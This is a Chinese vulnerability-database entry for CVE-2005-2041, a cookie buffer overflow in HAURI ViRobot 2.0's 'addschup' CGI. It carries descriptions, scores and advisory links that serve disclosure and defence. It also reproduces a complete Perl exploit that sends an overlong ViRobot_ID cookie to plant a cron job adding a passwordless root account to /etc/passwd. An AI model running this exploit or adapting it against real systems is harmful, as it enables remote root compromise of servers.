CVE-2005-2041
CVSS5.0
发布时间 :2005-06-15 00:00:00
修订时间 :2016-10-17 23:24:21
NMCOE    

[原文]Buffer overflow in addschup in HAURI ViRobot 2.0, and possibly other products, allows remote attackers to execute arbitrary code via a long ViRobot_ID cookie (HTTP_COOKIE).


[CNNVD]HAURI ViRobot 'addschup'缓冲区溢出漏洞(CNNVD-200506-132)

        HAURI ViRobot 2.0,可能还包括其它产品的addschup中存在缓冲区溢出漏洞,远程攻击者可借助一个超长ViRobot_ID cookie (HTTP_COOKIE)来执行任意代码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2041
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2041
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-132
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=full-disclosure&m=111880273631392&w=2
(UNKNOWN)  FULLDISC  20050615 DMA[2005-0614a] - 'Global Hauri ViRobot Server cookie overflow'
http://www.digitalmunition.com/DMA%5B2005-0614a%5D.txt
(VENDOR_ADVISORY)  MISC  http://www.digitalmunition.com/DMA%5B2005-0614a%5D.txt
http://www.globalhauri.com/html/download/down_unixpatch.html
(UNKNOWN)  CONFIRM  http://www.globalhauri.com/html/download/down_unixpatch.html
http://www.securiteam.com/exploits/5TP0C1FG1I.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/5TP0C1FG1I.html
http://www.securityfocus.com/bid/12964
(UNKNOWN)  BID  12964
http://xforce.iss.net/xforce/xfdb/21000
(UNKNOWN)  XF  virobot-addschup-bo(21000)

- 漏洞信息

HAURI ViRobot 'addschup'缓冲区溢出漏洞
中危 缓冲区溢出
2005-06-15 00:00:00 2005-10-20 00:00:00
远程  
        HAURI ViRobot 2.0,可能还包括其它产品的addschup中存在缓冲区溢出漏洞,远程攻击者可借助一个超长ViRobot_ID cookie (HTTP_COOKIE)来执行任意代码。

- 公告与补丁

        

- 漏洞信息 (1047)

ViRobot Advanced Server 2.0 (addschup) Remote Cookie Exploit (EDBID:1047)
linux remote
2005-06-14 Verified
8080 Kevin Finisterre
N/A [点击下载]
#!/usr/bin/perl
# ViRobot 2.0 remote cookie exploit - ala addschup
# copyright Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# jdam:/home/kfinisterre# ls -al /var/spool/cron/root
# ls: /var/spool/cron/root: No such file or directory
# jdam:/home/kfinisterre# ls -al /var/spool/cron/root
# -rw-r--r--  1 root staff 104 2005-01-23 14:43 /var/spool/cron/root
#
# We control the 6th paramater passed to an fprintf call.
#
# 0x804a740 <_IO_stdin_used+572>:  "%s %s %s %s %s %s/%s/vrupdate -s > /dev/null 2>&1\n"
#
# * * * * * /bin/echo r00t::0:0:root:/root:/bin/bash >> /etc/passwd &/ViRobot/vrupdate -s > /dev/null 2>&1


use IO::Socket;
$hostName = $ARGV[0];

$sock = IO::Socket::INET->new (
               Proto => "tcp",
               PeerAddr => $hostName,
               PeerPort => 8080,
               Type => SOCK_STREAM
);

if (! $sock)
{
       print "[*] Error, could not connect to the remote host: $!\n";
       exit (0);
}

$target = "/cgi-bin/addschup";
$crondata = "/bin/echo r00t::0:0:root:/root:/bin/bash >> /etc/passwd &";
$postbody = "POST $target HTTP/1.1\n" .
"Host: localhost:8080\n" .
"User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.3) Gecko/20041007 Debian/1.7.3-5\n" .
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n" .
"Accept-Encoding: gzip,deflate\n" .
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n" .
"Keep-Alive: 300\n" .
"Connection: keep-alive\n" .
"Content-type: application/x-www-form-urlencoded\n" .
"Content-length: 1\n" .
"Cookie: ViRobot_ID=" . "A" x 32 . "$crondata\n";

print $sock $postbody;
close ($sock);
exit (0);

# milw0rm.com [2005-06-14]
		

- 漏洞信息

17320
HAURI ViRobot Linux Server addschup Cookie Field Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in ViRobot Linux Server. ViRobot Linux Server fails to perform proper bounds checks in the setuid cgi-bin file 'addschup' when processing the received cookie resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary command execution via inserting commands into the root users crontab file resulting in a loss of integrity.

- 时间线

2005-06-15 Unknow
2005-06-15 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站